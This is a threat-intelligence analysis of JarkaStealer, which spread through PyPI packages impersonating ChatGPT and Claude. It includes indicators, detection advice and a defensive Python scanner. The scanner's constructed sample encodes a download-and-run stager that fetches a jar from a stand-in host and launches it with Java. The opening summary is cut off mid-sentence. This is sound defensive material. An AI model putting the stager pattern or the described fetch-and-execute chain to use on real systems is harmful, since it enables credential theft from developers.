Full Report
Cybersecurity researchers have discovered two malicious packages uploaded to the Python Package Index (PyPI) repository that impersonated popular artificial intelligence (AI) models like OpenAI ChatGPT and Anthropic Claude to deliver an information stealer called JarkaStealer. The packages, named gptplus and claudeai-eng, were uploaded by a user named "Xeroline" in November 2023, attracting
Analysis Summary
# Tool/Technique: JarkaStealer (via PyPI Impersonation)
## Overview
JarkaStealer is an information-stealing malware discovered being distributed through malicious Python packages on the Python Package Index (PyPI). These packages, named `gptplus` and `claudeai-eng`, impersonated legitimate AI model APIs (ChatGPT and Claude) to trick developers into installing them, thus initiating a supply chain attack.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Primarily Windows hosts running the Python interpreter (due to the use of Python libraries and Java execution).
- Capabilities: Steals sensitive information including browser data, system data, screenshots, and session tokens from applications like Telegram, Discord, and Steam. It operates via a multi-stage download and execution process.
- First Seen: November 2023 (packages uploaded).
## MITRE ATT&CK Mapping
Since this involves package abuse and remote execution:
- **TA0001 - Initial Access**
  - **T1190 - Exploit Public-Facing Application** (Distribution via a public repository like PyPI)
- **TA0002 - Execution**
  - **T1059.006 - Command and Scripting Interpreter: Python** (Malicious code embedded in `__init__.py`)
- **TA0010 - Exfiltration**
  - **T1041 - Exfiltration Over C2 Channel** (Transmitting collected data to attacker servers)
## Functionality
### Core Capabilities
- **Supply Chain Compromise:** Leveraging the trust in open-source repositories (PyPI).
- **Staging:** The malicious Python packages (`__init__.py`) execute code to fetch subsequent stages.
- **Dependency Retrieval:** Downloads a file named `JavaUpdater.jar` from a GitHub repository (`github[.]com/imystorage/storage`).
- **Environment Setup:** Downloads and installs the Java Runtime Environment (JRE) from a Dropbox URL if Java is missing, ensuring necessary preconditions for the malware execution.
- **Execution:** Executes the downloaded `JavaUpdater.jar`, which is the JarkaStealer payload.
### Advanced Features
- **Information Theft:** Specialized in harvesting credentials and session tokens from the locations where common applications store them (browsers, messaging/gaming apps).
- **Self-Cleaning:** Deletes collected data from the victim's machine after successful exfiltration.
- **Malware-as-a-Service (MaaS):** JarkaStealer was reportedly offered for sale on Telegram for $20-$50.
## Indicators of Compromise
- File Hashes: (Not explicitly provided in the text)
- File Names: `JavaUpdater.jar`, `gptplus` (package name), `claudeai-eng` (package name)
- Registry Keys: (Not provided)
- Network Indicators: C2 infrastructure hosted on `github[.]com/imystorage/storage` (for JAR download) and a source for JRE hosted on `dropbox[.]com`.
- Behavioral Indicators: Execution of Python code upon package installation that attempts to download and run a Java `.jar` file, especially if Java is not pre-installed.
## Associated Threat Actors
- The packages were published by the user "**Xeroline**" on PyPI.
- The malware itself (JarkaStealer) is associated with a MaaS operation offered through a Telegram channel.
## Detection Methods
- **Signature-based detection:** Scanning for known hashes of `JavaUpdater.jar`.
- **Behavioral detection:** Monitoring Python package installation processes (`pip install`) that trigger subsequent downloads (e.g., from GitHub or Dropbox) or launch Java processes unexpectedly. Flagging suspicious `__init__.py` content that contains Base64 decoding.
- **YARA rules:** (Not provided)
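
One way to run the `__init__.py` check described above without ever importing the package, as an added example (not code from the report or from any vendor). It reads each `__init__.py` as text, also decodes Base64 string literals, and matches the report's indicators in both layers; the function names, the regex patterns other than the two IoC strings, and the sample input are assumptions constructed for illustration.

```python
import ast
import base64
import re
from pathlib import Path

# IoC strings come from the report; the other patterns are illustrative heuristics.
RULES = {
    "remote_fetch": re.compile(r"urlretrieve|urlopen|requests\.get|https?://"),
    "java_launch": re.compile(r"\bjavaw?\b.*-jar\b|\.jar\b", re.I),
    "known_ioc": re.compile(r"JavaUpdater\.jar|imystorage/storage", re.I),
}

def decoded_literals(source):
    """Yield text recovered from string literals that are valid Base64."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return  # unparsable file: only the plain-text rules apply
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)) and len(node.value) >= 24:
            try:
                yield base64.b64decode(node.value, validate=True).decode("utf-8", "replace")
            except ValueError:  # not Base64 (binascii.Error is a ValueError)
                pass

def triage(source):
    """Return rule hits for one file; 'hidden:' marks hits inside decoded Base64."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    for text in decoded_literals(source):
        hits |= {"hidden:" + name for name, rx in RULES.items() if rx.search(text)}
    return hits

def is_suspicious(hits):
    """Flag known IoCs, anything hidden in Base64, or a plain download-and-run-Java pair."""
    return ({"remote_fetch", "java_launch"} <= hits
            or any(h == "known_ioc" or h.startswith("hidden:") for h in hits))

def scan_tree(root):
    """Read (never import) each __init__.py under root; return {relative path: sorted hits}."""
    found = {}
    for path in Path(root).rglob("__init__.py"):
        hits = triage(path.read_text(encoding="utf-8", errors="replace"))
        if is_suspicious(hits):
            found[path.relative_to(root).as_posix()] = sorted(hits)
    return found

# Constructed sample (inert text, parsed only): a stager hidden behind Base64.
_HIDDEN = base64.b64encode(b"urlretrieve('https://example.invalid/JavaUpdater.jar'); java -jar JavaUpdater.jar")
SAMPLE_INIT = 'import base64\nexec(base64.b64decode("' + _HIDDEN.decode() + '"))\n'
```

Point `scan_tree` at an unpacked sdist or wheel, or at a `site-packages` directory, and review every reported file by hand; a plain URL or Base64 call on its own is not reported.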
## Mitigation Strategies
- **Prevention measures:** Strict review and vetting of external Python libraries before installation, especially those imitating popular software.
- **Hardening recommendations:** Implement network filtering to restrict outbound connections to GitHub or Dropbox URLs initiated by common installation processes. Ensure robust Endpoint Detection and Response (EDR) capabilities to monitor for arbitrary file downloads and Java execution stemming from software installation routines. Use package checksum verification where possible.
## Related Tools/Techniques
- **JarkaStealer:** The ultimate payload.
- **PyPI Tampering:** The overall distribution technique, similar to dependency confusion or typo-squatting campaigns, but using impersonation of AI tooling names.
- **Leaked Source Code:** The source code for JarkaStealer was reportedly leaked on GitHub by user `Loremas1er`.